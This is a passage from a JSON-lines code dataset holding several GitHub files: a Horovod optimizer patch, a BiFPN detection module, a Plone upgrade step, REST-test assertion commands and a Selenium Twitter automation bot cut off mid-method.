(layer_counter, gradient_counter))\n ret = tf.zeros_like(inp)\n elif do_action and _action.startswith('stop-'):\n limit = int(_action.split('-')[1])\n if _rank >= limit:\n ret = tf.zeros_like(inp)\n else:\n ret = tf.divide(inp, limit)\n elif do_action and _action == 'abort':\n #wrh.log('abort', '%r', (layer_counter, gradient_counter))\n ret = tf.errors.AbortedError(None, None, 'act after layers')\n else:\n #wrh.log('divisor', '%r', _divisor)\n ret = tf.divide(inp, _divisor)\n\n #wrh.pop('create_distributed_optimizer._DistributedOptimizer._compute_gradients.wrapper')\n if isinstance(ret, tf.errors.OpError):\n raise ret\n else:\n return ret\n\n return tf.py_function(wrapper, (tensor,), tensor.dtype)\n \n grads = list(grads)\n for i, grad in enumerate(grads):\n grads[i] = make_wrapper(grad)\n\n allreduced_grads = self._allreduce(grads, weights)\n ret = list(zip(allreduced_grads, weights))\n\n return ret\n\n def get_gradients(self, loss, params):\n \"\"\"\n Compute gradients of all trainable variables.\n See Optimizer.get_gradients() for more info.\n In DistributedOptimizer, get_gradients() is overriden to also\n allreduce the gradients before returning them.\n \"\"\"\n gradients = super(self.__class__, self).get_gradients(loss, params)\n return self._allreduce(gradients, params)\n\n def _aggregate_gradients(self, grads_and_vars):\n if _PRE_TF_2_4_0:\n grads, vars = list(zip(*grads_and_vars))\n aggregated_grads = self._allreduce(grads, vars)\n return aggregated_grads\n else:\n return super(self.__class__, self)._aggregate_gradients(\n grads_and_vars)\n\n def _allreduce(self, grads, vars):\n self._aggregated_gradients = True\n\n if self._agg_helper:\n return self._agg_helper.compute_gradients(tuple(grads), tuple(vars))\n else:\n return self._allreduce_grads(grads, vars)\n\n def apply_gradients(self, *args, **kwargs):\n if self._agg_helper:\n if isinstance(args[0], zip):\n # If grad_and_vars are passed in as a zip object\n # convert to a list. This is necessary for TF2.4+\n # b/c args[0] is used in both conditional branches\n # inside _agg_helper.apply_gradients().\n args = list(args)\n args[0] = list(args[0])\n args = tuple(args)\n\n results = self._agg_helper.apply_gradients(\n lambda: super(self.__class__, self).apply_gradients(*args, **kwargs),\n self,\n *args,\n **kwargs,\n )\n else:\n results = super(self.__class__, self).apply_gradients(*args, **kwargs)\n\n if _PRE_TF_2_4_0 and not self._aggregated_gradients:\n raise Exception('`apply_gradients()` was called without a call to '\n '`get_gradients()` or `_aggregate_gradients`. If you\\'re '\n 'using TensorFlow 2.0, please specify '\n '`experimental_run_tf_function=False` in `compile()`.')\n\n return results\n\n # We dynamically create a new class that inherits from the optimizer that was passed in.\n # The goal is to override get_gradients() method with an allreduce implementation.\n # This class will have the same name as the optimizer it's wrapping, so that the saved\n # model could be easily restored without Horovod.\n cls = type(optimizer.__class__.__name__, (optimizer.__class__,),\n dict(_DistributedOptimizer.__dict__))\n\n config = optimizer.get_config()\n if not _PRE_TF_2_4_0 and issubclass(optimizer.lr.__class__,\n keras.optimizers.schedules.LearningRateSchedule):\n lr_cls = type(optimizer.lr.__class__.__name__, (optimizer.lr.__class__,),\n dict(optimizer.lr.__dict__))\n config['learning_rate'] = lr_cls.from_config(config['learning_rate']['config'])\n\n return cls.from_config(config)\n","repo_name":"player1537-playground/metem","sub_path":"imagenet/mypatch.py","file_name":"mypatch.py","file_ext":"py","file_size_in_byte":10102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72271288487","text":"import logging\n\nimport changan_plugin_pytorch.nn as nnf\nimport torch\nimport torch.nn as nn\nfrom easydict import EasyDict as edict\nfrom torch.nn import ModuleDict, ModuleList, Sequential\nfrom torch.nn.quantized import FloatFunctional\n\nfrom cap.models.base_modules import ConvModule2d\nfrom cap.models.utils import _check_strides\nfrom cap.models.weight_init import normal_init\nfrom cap.registry import OBJECT_REGISTRY\nfrom cap.utils.apply_func import _as_list\nfrom cap.utils.logger import rank_zero_info\n\n__all__ = [\"BiFPN\"]\n\nlogger = logging.getLogger(__name__)\n\n\nclass MaybeApply1x1(nn.Module):\n \"\"\"Use conv1x1 and bn to change channel.\n\n Args:\n in_channels (int): Number of input channels.\n out_channels (int): Number of output channels.\n use_bn (bool): if use bn\n\n \"\"\"\n\n def __init__(self, in_channels, out_channels, use_bn=False):\n super(MaybeApply1x1, self).__init__()\n if in_channels == out_channels:\n return None\n self.lateral_conv = ModuleList()\n conv = nn.Conv2d(\n in_channels=in_channels,\n out_channels=out_channels,\n kernel_size=1,\n stride=1,\n padding=0,\n )\n self.lateral_conv.append(conv)\n if use_bn:\n norm = nn.BatchNorm2d(out_channels)\n self.lateral_conv.append(norm)\n\n def forward(self, x):\n if hasattr(self, \"lateral_conv\"):\n for module in self.lateral_conv:\n x = module(x)\n return x\n else:\n return x\n\n\nclass Resize(nn.Module):\n \"\"\"The layer is used to change the feather map size or keep shape.\n\n # TODO(min.du, 1.0): move to cap/ops #\n\n Args:\n sampling (str): Sampling way, the candidate is ['down', 'up', 'keep'].\n e.g. 'down' : downsampling.\n 'up' : upsampling.\n 'keep' : keep shape unchanged.\n in_channels (int): Number of input channels.\n out_channels (int): Number of output channels.\n pooling_type (str): Pooling type, the candidate is ['max', 'avg']\n use_bn (bool): if use bn\n conv_after_downsample (bool):\n Whether 1X1 conv is placed after downsample.\n\n Returns (tensor): Resized feature map.\n\n \"\"\"\n\n def __init__(\n self,\n sampling,\n in_channels,\n out_channels,\n pooling_type=\"max\",\n use_bn=True,\n conv_after_downsample=False,\n ):\n super(Resize, self).__init__()\n assert sampling in [\"down\", \"up\", \"keep\"]\n assert pooling_type in [\"max\", \"avg\"]\n self.sampling = sampling\n self.resize_layer = ModuleList()\n if sampling == \"down\":\n if not conv_after_downsample:\n lateral_conv = MaybeApply1x1(in_channels, out_channels, use_bn)\n if lateral_conv:\n self.resize_layer.append(lateral_conv)\n if pooling_type == \"max\":\n pooling = nn.MaxPool2d(kernel_size=2, stride=2, padding=0)\n elif pooling_type == \"avg\":\n pooling = nn.AvgPool2d(kernel_size=2, stride=2, padding=0)\n self.resize_layer.append(pooling)\n if conv_after_downsample:\n lateral_conv = MaybeApply1x1(in_channels, out_channels, use_bn)\n if lateral_conv:\n self.resize_layer.append(lateral_conv)\n else:\n lateral_conv = MaybeApply1x1(in_channels, out_channels, use_bn)\n if lateral_conv:\n self.resize_layer.append(lateral_conv)\n if sampling == \"up\":\n self.upsampling = nnf.Interpolate(\n scale_factor=2, mode=\"bilinear\", recompute_scale_factor=True\n )\n\n def forward(self, x):\n \"\"\"Forward feature.\n\n Args:\n x (tensor): input tensor\n\n Returns (tensor): resized tensor\n\n \"\"\"\n\n for module in self.resize_layer:\n x = module(x)\n if self.sampling == \"up\":\n x = self.upsampling(x)\n return x\n\n\nclass Fusion(nn.Module):\n \"\"\"Multi-level feature fusion.\n\n Args:\n weight_len (int): Number of the input tensors\n weight_method (str): sum or fastattn\n eps (float): Avoid except 0\n\n \"\"\"\n\n def __init__(\n self, in_channels, weight_len, weight_method=\"sum\", eps=0.0001\n ):\n super(Fusion, self).__init__()\n self.weight_method = weight_method\n self.eps = eps\n self.floatF = FloatFunctional()\n if weight_method == \"fastattn\":\n self.edge_weights = nn.Parameter(\n torch.ones(weight_len, dtype=torch.float32), requires_grad=True\n )\n self.relu = nn.ReLU(inplace=True)\n\n def float_function_sum(self, x):\n x = _as_list(x)\n for i, val in enumerate(x):\n if i == 0:\n res = val\n else:\n res = self.floatF.add(res, val)\n return res\n\n def forward(self, x):\n x = list(x)\n if self.weight_method == \"sum\":\n return self.float_function_sum(x)\n elif self.weight_method == \"fastattn\":\n # edge_weights would be followed with relu to become positive\n relu_edge_weights = self.relu(self.edge_weights)\n weights_sum = self.float_function_sum(relu_edge_weights)\n for i in range(len(x)):\n x[i] = x[i] * relu_edge_weights[i]\n x[i] = x[i] / (weights_sum + self.eps)\n return self.float_function_sum(x)\n\n\nclass BifpnLayer(nn.Module):\n \"\"\"The basic structure of BiFPN.\n\n Args:\n fpn_config (dict): The dict is used for build the bifpn node\n out_index (list[int]): Get final output tensor list\n\n \"\"\"\n\n def __init__(self, fpn_config, out_index=None):\n\n super(BifpnLayer, self).__init__()\n self.fpn_config = fpn_config\n self.out_index = out_index\n level = fpn_config.level\n in_channels = fpn_config.in_channels\n out_channels = fpn_config.out_channels\n offset2inchannels = {\n 0: out_channels[0],\n 1: out_channels[1],\n 2: out_channels[2],\n 3: out_channels[3],\n 4: out_channels[4],\n 5: out_channels[3],\n 6: out_channels[2],\n 7: out_channels[1],\n 8: out_channels[0],\n 9: out_channels[1],\n 10: out_channels[2],\n 11: out_channels[3],\n }\n offset2out_channels = {\n 0: {\"keep\": out_channels[0]},\n 1: {\"keep\": out_channels[1]},\n 2: {\"keep\": out_channels[2]},\n 3: {\"keep\": out_channels[3]},\n 4: {\"keep\": out_channels[4], \"up\": out_channels[3]},\n 5: {\"keep\": out_channels[3], \"up\": out_channels[2]},\n 6: {\"keep\": out_channels[2], \"up\": out_channels[1]},\n 7: {\"keep\": out_channels[1], \"up\": out_channels[0]},\n 8: {\"down\": out_channels[1]},\n 9: {\"down\": out_channels[2]},\n 10: {\"down\": out_channels[3]},\n 11: {\"down\": out_channels[4]},\n }\n weight_method = fpn_config.weight_method\n self.all_nodes = ModuleDict()\n for i, fnode in enumerate(fpn_config.nodes):\n rank_zero_info(f\"fnode {i} : {fnode}\")\n node = ModuleList()\n out_ch = 0\n # resize\n for offset, sampling in zip(\n fnode[\"inputs_offsets\"], fnode[\"sampling\"]\n ):\n in_ch = (\n in_channels[offset]\n if offset < level\n else offset2inchannels[offset]\n )\n out_ch = offset2out_channels[offset][sampling]\n node.append(Resize(sampling, in_ch, out_ch))\n\n # fusion\n node.append(\n Fusion(out_ch, len(fnode[\"inputs_offsets\"]), weight_method)\n )\n\n # relu, conv, bn\n node.append(\n Sequential(\n nn.ReLU(inplace=True),\n nn.Conv2d(\n out_ch,\n out_ch,\n kernel_size=3,\n stride=1,\n bias=False,\n groups=out_ch,\n padding=1,\n ),\n ConvModule2d(\n in_channels=out_ch,\n out_channels=out_ch,\n kernel_size=1,\n stride=1,\n groups=1,\n padding=0,\n norm_layer=nn.BatchNorm2d(out_ch),\n ),\n )\n )\n # append with name\n self.all_nodes[str(i)] = node\n\n def forward(self, x):\n x = list(x)\n assert len(x) == self.fpn_config.level\n for i, fnode in enumerate(self.fpn_config.nodes):\n nodes = []\n for idx, input_offset in enumerate(fnode[\"inputs_offsets\"]):\n input_node = x[input_offset]\n input_node = self.all_nodes[str(i)][idx](input_node) # resize\n nodes.append(input_node)\n # fusion\n new_node = self.all_nodes[str(i)][idx + 1](nodes)\n # activation + separable conv + bn\n new_node = self.all_nodes[str(i)][idx + 2](new_node)\n x.append(new_node)\n\n all_outs = [x[i] for i in range(-self.fpn_config.level, 0, 1)]\n if self.out_index is not None:\n return [all_outs[i] for i in self.out_index]\n return all_outs\n\n\ndef get_fpn_config(fpn_name=\"bifpn_sum\", out_channels=64):\n assert fpn_name in [\"bifpn_sum\", \"bifpn_fa\"]\n fpn_config = edict()\n fpn_config.out_channels = out_channels\n fpn_config.level = 5\n # define connection method\n fpn_config.nodes = [\n {\"inputs_offsets\": [3, 4], \"sampling\": [\"keep\", \"up\"]},\n {\"inputs_offsets\": [2, 5], \"sampling\": [\"keep\", \"up\"]},\n {\"inputs_offsets\": [1, 6], \"sampling\": [\"keep\", \"up\"]},\n {\"inputs_offsets\": [0, 7], \"sampling\": [\"keep\", \"up\"]},\n {\"inputs_offsets\": [1, 7, 8], \"sampling\": [\"keep\", \"keep\", \"down\"]},\n {\"inputs_offsets\": [2, 6, 9], \"sampling\": [\"keep\", \"keep\", \"down\"]},\n {\"inputs_offsets\": [3, 5, 10], \"sampling\": [\"keep\", \"keep\", \"down\"]},\n {\"inputs_offsets\": [4, 11], \"sampling\": [\"keep\", \"down\"]},\n ]\n # define weighting method\n fpn_config.weight_method = \"sum\"\n if fpn_name == \"bifpn_fa\":\n fpn_config.weight_method = \"fastattn\"\n\n return fpn_config\n\n\n@OBJECT_REGISTRY.register\nclass BiFPN(nn.Module):\n \"\"\"Weighted Bi-directional Feature Pyramid Network(BiFPN).\n\n This is an implementation of - EfficientDet: Scalable and Efficient Object\n Detection (https://arxiv.org/abs/1911.09070)\n\n Args:\n in_strides (list[int]): Stride of input feature map\n out_strides (int): Stride of output feature map\n stride2channels (dict): The key:value is stride:channel ,\n the channles have been multipified by alpha\n out_channels (int|dict): Channel number of output layer, the key:value\n is stride:channel.\n num_outs (int): Number of BifpnLayer's input, the value is must 5,\n because the bifpn layer is fixed\n stack (int): Number of BifpnLayer\n start_level (int): Index of the start input backbone level\n used to build the feature pyramid. Default: 0.\n end_level (int): Index of the end input backbone level (exclusive)\n to build the feature pyramid. Default: -1, means the last level.\n fpn_name (str): the value is mutst between with 'bifpn_sum', 'bifpn_fa'\n\n \"\"\"\n\n def __init__(\n self,\n in_strides,\n out_strides,\n stride2channels,\n out_channels,\n num_outs,\n stack=3,\n start_level=0,\n end_level=-1,\n fpn_name=\"bifpn_sum\",\n ):\n super(BiFPN, self).__init__()\n\n self.in_strides = in_strides\n self.out_strides = out_strides\n self.stride2channels = stride2channels\n self.in_channels = [stride2channels[stride] for stride in in_strides]\n assert isinstance(out_channels, int) or isinstance(out_channels, dict)\n self.out_channels = (\n [out_channels[stride] for stride in out_strides]\n if isinstance(out_channels, dict)\n else [out_channels for _ in out_strides]\n )\n self.num_ins = len(in_strides)\n self.num_outs = num_outs\n\n # assert in_strides in stride2channels\n self.in_strides = _check_strides(\n in_strides, self.stride2channels.keys()\n )\n\n assert len(self.out_strides) <= num_outs\n assert stack >= 1\n self.stack = stack\n self.fpn_config = get_fpn_config(fpn_name, self.out_channels)\n\n if end_level == -1:\n self.backbone_end_level = self.num_ins\n assert self.num_outs >= self.num_ins - start_level\n else:\n # if end_level < inputs, no extra level is allowed\n self.backbone_end_level = end_level\n assert end_level <= len(self.in_channels)\n assert self.num_outs == end_level - start_level\n\n self.start_level = start_level\n self.end_level = end_level\n # add extra downsample layers (stride-2 pooling or conv + pooling)\n # to build extra input features that are not from backbone.\n extra_levels = (\n self.num_outs - self.backbone_end_level + self.start_level\n )\n # channels for multi-level feature-map used in bifpn\n self.fpn_config.in_channels = self.in_channels[\n self.start_level : self.backbone_end_level\n ] + [\n self.out_channels[self.backbone_end_level - self.start_level + i]\n for i in range(extra_levels)\n ]\n # bifpn total out strides and out_index\n self.total_out_strides = self.in_strides[\n self.start_level : self.backbone_end_level\n ] + [\n self.in_strides[self.backbone_end_level - 1] * (2 ** (i + 1))\n for i in range(extra_levels)\n ]\n self.out_index = [\n self.total_out_strides.index(stride) for stride in self.out_strides\n ]\n # build extra_downsample layers\n self.extra_downsamples = ModuleList()\n for i in range(extra_levels):\n out_channels = self.out_channels[\n self.backbone_end_level - self.start_level + i\n ]\n downsample = Resize(\n sampling=\"down\",\n in_channels=self.in_channels[-1],\n out_channels=out_channels,\n pooling_type=\"max\",\n use_bn=True,\n conv_after_downsample=False,\n )\n self.in_channels[-1] = out_channels\n self.extra_downsamples.append(downsample)\n # repeat build bifpn layer many times\n self.bifpn_layers = ModuleList()\n for i in range(self.stack):\n rank_zero_info(\"building bifpn cell %d\" % (i))\n if i == self.stack - 1:\n out_index = self.out_index\n else:\n out_index = None\n bifpn_layer = BifpnLayer(edict(self.fpn_config.copy()), out_index)\n self.bifpn_layers.append(bifpn_layer)\n # update fpn_in_channels, only need to update once\n if i == 0:\n self.fpn_config.in_channels = [\n self.out_channels[i] for i in range(self.num_outs)\n ]\n self._init_weights()\n\n def _init_weights(self):\n \"\"\"Initialize the weights of BiFPN module.\"\"\"\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n normal_init(m, mean=0, std=0.01, bias=0)\n\n def forward(self, inputs):\n \"\"\"Forward features.\n\n Args:\n inputs (list[tensor]): Input tensors\n\n Returns (list[tensor]): Output tensors\n\n \"\"\"\n assert len(inputs) == len(self.in_channels)\n x = list(inputs[self.start_level : self.backbone_end_level])\n # build extra input features\n for downsample in self.extra_downsamples:\n x.append(downsample(x[-1]))\n # repeat bifpn\n for i in range(self.stack):\n x = self.bifpn_layers[i](x)\n return x\n\n def fuse_model(self):\n try:\n from changan_plugin_pytorch import quantization\n\n fuser_func = quantization.fuse_known_modules\n except ImportError:\n logging.warning(\n \"Please install changan_plugin_pytorch first, otherwise use \"\n \"pytorch official quantification\"\n )\n from torch.quantization.fuse_modules import fuse_known_modules\n\n fuser_func = fuse_known_modules\n\n total_fuse = 0\n for m in self.modules():\n if type(m) == MaybeApply1x1:\n if hasattr(m, \"lateral_conv\"):\n torch.quantization.fuse_modules(\n m,\n [\"lateral_conv.0\", \"lateral_conv.1\"],\n inplace=True,\n fuser_func=fuser_func,\n )\n total_fuse += 1\n elif type(m) == ConvModule2d:\n m.fuse_model()\n total_fuse += 1\n rank_zero_info(\"neck total_fuse {}\".format(total_fuse))\n\n def set_qconfig(self):\n from cap.utils import qconfig_manager\n\n self.qconfig = qconfig_manager.get_default_qat_qconfig()\n","repo_name":"xingyun-xy/cap","sub_path":"cap/models/necks/bifpn.py","file_name":"bifpn.py","file_ext":"py","file_size_in_byte":17639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"554695524","text":"from ftw.upgrade import UpgradeStep\nimport pkg_resources\n\n\nclass RemoveCssbundle(UpgradeStep):\n \"\"\"Remove cssbundle.\n \"\"\"\n\n def __call__(self):\n IS_PLONE_5 = pkg_resources.get_distribution('Products.CMFPlone').version >= '5'\n if IS_PLONE_5:\n self.install_upgrade_profile()\n","repo_name":"4teamwork/ftw.colorbox","sub_path":"ftw/colorbox/upgrades/20200508162012_remove_cssbundle/upgrade.py","file_name":"upgrade.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"74267195686","text":"from requests.status_codes import _codes\nfrom requests.structures import CaseInsensitiveDict\nfrom .command import Command\nfrom .command_factory import CommandFactory\nfrom .command_register import CommandRegister\nfrom .indor_exceptions import SyntaxErrorWrongNumberOfArguments, InvalidRelationalOperator\nfrom .parsed_value import ParsedValue\nfrom .parsing_exception import ParsingException\nfrom .relational_operators import compare_by_supposed_relational_operator\nfrom .result import Error, Passed, Failed\nfrom . import result\n\n\nclass CommandResponseRedirects(Command, metaclass=CommandRegister):\n pretty_name = \"ASSERT RESPONSE REDIRECTS\"\n\n def __init__(self, result_collector):\n super(CommandResponseRedirects, self).__init__(result_collector)\n\n def parse(self, path):\n next_step = CommandFactory().get_class(self.__class__.__name__, path[0], self.result_collector)\n return next_step.parse(path[1:])\n\n\nclass CommandResponseRedirectsCount(Command, metaclass=CommandRegister):\n pretty_name = \"RESPONSE REDIRECTS COUNT\"\n\n def __init__(self, result_collector):\n super(CommandResponseRedirectsCount, self).__init__(result_collector)\n\n def parse(self, path):\n if len(path) != 2 and len(path) != 0:\n raise SyntaxErrorWrongNumberOfArguments(self.__class__.__name__,\n 'Two or zero arguments expected: relational operator and number. Example: < 2')\n\n response = self.result_collector.get_response()\n if response is None:\n raise ParsingException(self, result.ERROR_RESPONSE_NOT_FOUND)\n\n try:\n actual = len(response.history)\n\n if len(path) == 0:\n actual, ParsedValue(self, None, \"\")\n\n relational_operator = path[0]\n expected = int(path[1])\n\n parsed = ParsedValue(self, True, relational_operator + \" \" + path[1])\n computed = compare_by_supposed_relational_operator(actual, relational_operator, expected)\n return computed, parsed\n except ValueError:\n raise ParsingException(self, result.ERROR_NUMBER_EXPECTED)\n except InvalidRelationalOperator as e:\n raise ParsingException(self, Error.from_exception(self, e))\n\n\nclass CommandResponse(Command, metaclass=CommandRegister):\n pretty_name = \"ASSERT RESPONSE\"\n\n def __init__(self, result_collector):\n super(CommandResponse, self).__init__(result_collector)\n\n def parse(self, path):\n if len(path) == 0:\n raise SyntaxErrorWrongNumberOfArguments(self.__class__.__name__,\n hints=CommandFactory().get_class_children(\n self.__class__.__name__))\n\n next_step = CommandFactory().get_class(self.__class__.__name__, path[0], self.result_collector)\n return next_step.parse(path[1:])\n\n\nclass CommandResponseNot(Command, metaclass=CommandRegister):\n pretty_name = \"ASSERT RESPONSE NOT\"\n\n def __init__(self, result_collector):\n super(CommandResponseNot, self).__init__(result_collector)\n\n def parse(self, path):\n if len(path) == 0:\n raise SyntaxErrorWrongNumberOfArguments(self.__class__.__name__,\n hints=CommandFactory().get_class_children(\n self.__class__.__name__))\n\n next_step = CommandFactory().get_class(self.__class__.__name__, path[0], self.result_collector)\n return next_step.parse(path[1:])\n\n\nclass CommandResponseStatus(Command, metaclass=CommandRegister):\n pretty_name = \"RESPONSE STATUS\"\n\n def __init__(self, result_collector):\n super(CommandResponseStatus, self).__init__(result_collector)\n self.mapping = CaseInsensitiveDict()\n self.mapping[\"Ok\"] = 200\n self.mapping[\"Not found\"] = 404\n\n def map_status_code(self, status):\n \"\"\"\n\n author Damian Mirecki\n\n :param status\n :return:\n :rtype: int\n :raise LookupError: When status is not implemented yet.\n \"\"\"\n\n if status not in self.mapping:\n raise LookupError(\"Status \" + status + \" not found in \" + self.mapping.__str__())\n\n return self.mapping[status]\n\n def parse(self, path):\n response = self.result_collector.get_response()\n if response is None:\n raise ParsingException(self, result.ERROR_RESPONSE_NOT_FOUND)\n\n actual = response.status_code\n\n if len(path) == 0:\n return actual, ParsedValue(self, None, \"\")\n\n status = path[0]\n\n if not status.isdigit():\n try:\n status = self.map_status_code(status)\n except LookupError as e:\n raise ParsingException(self, Error.from_exception(self, e))\n else:\n if int(status) not in _codes.keys():\n raise ParsingException(self, result.ERROR_INVALID_STATUS_CODE)\n\n expected = int(status)\n return actual, ParsedValue(self, expected, \"\")\n\n\nclass CommandResponseType(Command, metaclass=CommandRegister):\n pretty_name = \"ASSERT RESPONSE TYPE\"\n\n def __init__(self, result_collector):\n super(CommandResponseType, self).__init__(result_collector)\n\n def parse(self, path):\n if len(path) == 0:\n raise SyntaxErrorWrongNumberOfArguments(self.__class__.__name__,\n hints=CommandFactory().get_class_children(\n self.__class__.__name__))\n\n next_step = CommandFactory().get_class(self.__class__.__name__, path[0], self.result_collector)\n return next_step.parse(path[1:])\n\n\nclass CommandResponseTypeJson(Command, metaclass=CommandRegister):\n pretty_name = \"RESPONSE CONTENT TYPE IS JSON\"\n\n def __init__(self, result_collector):\n super(CommandResponseTypeJson, self).__init__(result_collector)\n\n def parse(self, path):\n response = self.result_collector.get_response()\n if response is None:\n raise ParsingException(self, result.ERROR_RESPONSE_NOT_FOUND)\n\n try:\n response.json()\n except ValueError:\n return False, ParsedValue(self, True, \"not json\")\n else:\n return True, ParsedValue(self, True, \"not json\")\n\n\nclass CommandResponseLength(Command, metaclass=CommandRegister):\n pretty_name = \"ASSERT RESPONSE LENGTH\"\n\n def __init__(self, result_collector):\n super(CommandResponseLength, self).__init__(result_collector)\n\n def parse(self, path):\n if len(path) != 2 and len(path) != 0:\n raise SyntaxErrorWrongNumberOfArguments(self.__class__.__name__,\n 'Two or zero arguments expected: relational operator and number. Example: < 2')\n\n response = self.result_collector.get_response()\n if response is None:\n raise ParsingException(self, result.ERROR_RESPONSE_NOT_FOUND)\n\n try:\n content_length = len(response.content)\n\n if len(path) == 0:\n return content_length, ParsedValue(self, None, \"\")\n\n relational_operator = path[0]\n expected = int(path[1])\n\n parsed = ParsedValue(self, True, relational_operator + \" \" + path[1])\n computed = compare_by_supposed_relational_operator(content_length, relational_operator, expected)\n return computed, parsed\n except ValueError:\n raise ParsingException(self, result.ERROR_NUMBER_EXPECTED)\n except InvalidRelationalOperator as e:\n raise ParsingException(self, Error.from_exception(self, e))\n\n\nclass CommandResponseEmpty(Command, metaclass=CommandRegister):\n __metaclass__ = CommandRegister\n\n pretty_name = \"RESPONSE EMPTY\"\n\n def __init__(self, result_collector):\n super(CommandResponseEmpty, self).__init__(result_collector)\n\n def parse(self, path):\n response = self.result_collector.get_response()\n if response is None:\n raise ParsingException(self, result.ERROR_RESPONSE_NOT_FOUND)\n\n computed = len(response.content) == 0\n parsed = ParsedValue(self, True, \"EMPTY\")\n return computed, parsed\n\n\nclass CommandResponseNotEmpty(Command, metaclass=CommandRegister):\n pretty_name = \"RESPONSE NOT EMPTY\"\n\n def __init__(self, result_collector):\n super(CommandResponseNotEmpty, self).__init__(result_collector)\n\n def parse(self, args):\n response = self.result_collector.get_response()\n if response is None:\n raise ParsingException(self, result.ERROR_RESPONSE_NOT_FOUND)\n\n computed = len(response.content) != 0\n parsed = ParsedValue(self, True, \"NOT EMPTY\")\n return computed, parsed\n\n\nclass CommandResponseTime(Command, metaclass=CommandRegister):\n pretty_name = \"ASSERT RESPONSE TIME\"\n\n missed_arguments = 'At least two arguments expected: relational operator and number. Example: < 2'\n\n def __init__(self, result_collector):\n super(CommandResponseTime, self).__init__(result_collector)\n\n def parse(self, path):\n response = self.result_collector.get_response()\n if response is None:\n raise ParsingException(self, result.ERROR_RESPONSE_NOT_FOUND)\n\n response_time = response.elapsed.total_seconds() * 1000\n\n if len(path) < 2:\n return response_time, ParsedValue(self, None, \"\")\n\n try:\n relational_operator = path[0]\n expected = int(path[1])\n parsed = ParsedValue(self, True, relational_operator + \" \" + path[1])\n computed = compare_by_supposed_relational_operator(response_time, relational_operator, expected)\n return computed, parsed\n except ValueError:\n raise ParsingException(self, result.ERROR_NUMBER_EXPECTED)\n except InvalidRelationalOperator as e:\n raise ParsingException(self, Error.from_exception(self, e))","repo_name":"nokia-wroclaw/innovativeproject-resttest","sub_path":"src/indor/command_response.py","file_name":"command_response.py","file_ext":"py","file_size_in_byte":10107,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"28089812599","text":"from selenium import webdriver\nfrom selenium import common\nfrom selenium.webdriver.common import keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport time\nimport datetime\nfrom utils import *\nimport numpy as np\nfrom TwitterUser import *\n\n\n\n\n# https://zhuanlan.zhihu.com/p/60852696\noption = webdriver.ChromeOptions()\noption.add_argument('--disable-gpu')\noption.add_argument('--start-maximized')\noption.add_argument('blink-settings=imagesEnabled=false')\nprefs = {\n 'profile.default_content_setting_values' : {\n 'notifications' : 2\n }\n}\n# 保持页面登录状态\noption.add_argument(r'user-data-dir=C:\\Users\\LY\\AppData\\Local\\Google\\Chrome\\User Data')\noption.add_experimental_option('prefs', prefs)\ndriver = webdriver.Chrome(chrome_options=option)\ndriver.implicitly_wait(30)\ndriver.maximize_window()\nclass TwitterBot:\n\n \"\"\"\n A Bot class that provide features of:\n - Logging into your Twitter account\n - Liking tweets of your homepage\n - Searching for some keyword or hashtag\n - Liking tweets of the search results\n - Posting tweets\n - Logging out of your account\n\n ........\n\n Attributes\n ----------\n email : str\n user email for Twitter account\n password : str\n user password for Twitter account\n bot : WebDriver\n webdriver that carry out the automation tasks\n is_logged_in : bool\n boolean to check if the user is logged in or not\n\n Methods\n -------\n login()\n logs user in based on email and password provided during initialisation\n logout()\n logs user out\n search(query: str)\n searches for the provided query string\n like_tweets(cycles: int)\n loops over number of cycles provided, scrolls the page down and likes the available tweets on the page in each loop pass\n \"\"\"\n \n\n def __init__(self, email, password, userName, maxScrollDownTimes, outputTweetsPath, urlPrefix, translateTargetLanguage):\n self.email = email\n self.password = password\n self.userName = userName\n self.bot = driver\n self.outputTweetsPath = outputTweetsPath\n self.maxScrollDownTimes = maxScrollDownTimes\n self.urlPrefix = urlPrefix\n self.translateTargetLanguage = translateTargetLanguage\n self.is_logged_in = False\n\n\n def loginNormal(self):\n bot = self.bot\n bot.get('https://twitter.com/i/flow/login')\n\n emailInput = bot.find_element(By.NAME, r'text')\n emailInput.clear()\n emailInput.send_keys(self.email)\n\n time.sleep(2)\n\n nextStepButton = bot.find_element(By.XPATH, r'//*[@id=\"layers\"]/div/div/div/div/div/div/div[2]/div[2]/div/div/div[2]/div[2]/div/div/div/div[6]/div')\n nextStepButton.click()\n\n passwdInput = bot.find_element(By.NAME, r'password')\n passwdInput.clear()\n passwdInput.send_keys(self.password)\n\n loginButton = bot.find_element(By.XPATH, r'//*[@id=\"layers\"]/div/div/div/div/div/div/div[2]/div[2]/div/div/div[2]/div[2]/div[2]/div/div[1]/div/div/div/div')\n loginButton.click()\n\n self.is_logged_in = True\n def loginAbnormal(self):\n bot = self.bot\n bot.get('https://twitter.com/i/flow/login')\n\n emailInput = bot.find_element(By.NAME, r'text')\n emailInput.clear()\n emailInput.send_keys(self.email)\n time.sleep(2)\n nextStepButton = bot.find_element(By.XPATH, r'//*[@id=\"layers\"]/div/div/div/div/div/div/div[2]/div[2]/div/div/div[2]/div[2]/div/div/div/div[6]/div')\n nextStepButton.click()\n\n userIdInput = bot.find_element(By.NAME, 'text')\n userIdInput.clear()\n userIdInput.send_keys(self.userName)\n userIdInput.send_keys(keys.Keys.ENTER)\n time.sleep(2)\n\n passwdInput = bot.find_element(By.NAME, r'password')\n passwdInput.clear()\n passwdInput.send_keys(self.password)\n passwdInput.send_keys(keys.Keys.ENTER)\n\n self.is_logged_in = True\n\n def logout(self):\n if not self.is_logged_in:\n return \n\n bot = self.bot\n bot.get('https://twitter.com/home')\n time.sleep(4)\n\n try:\n bot.find_element_by_xpath(\"//div[@data-testid='SideNav_AccountSwitcher_Button']\").click()\n except common.exceptions.NoSuchElementException:\n time.sleep(3)\n bot.find_element_by_xpath(\"//div[@data-testid='SideNav_AccountSwitcher_Button']\").click()\n\n time.sleep(1)\n\n try:\n bot.find_element_by_xpath(\"//a[@data-testid='AccountSwitcher_Logout_Button']\").click()\n except common.exceptions.NoSuchElementException:\n time.sleep(2)\n 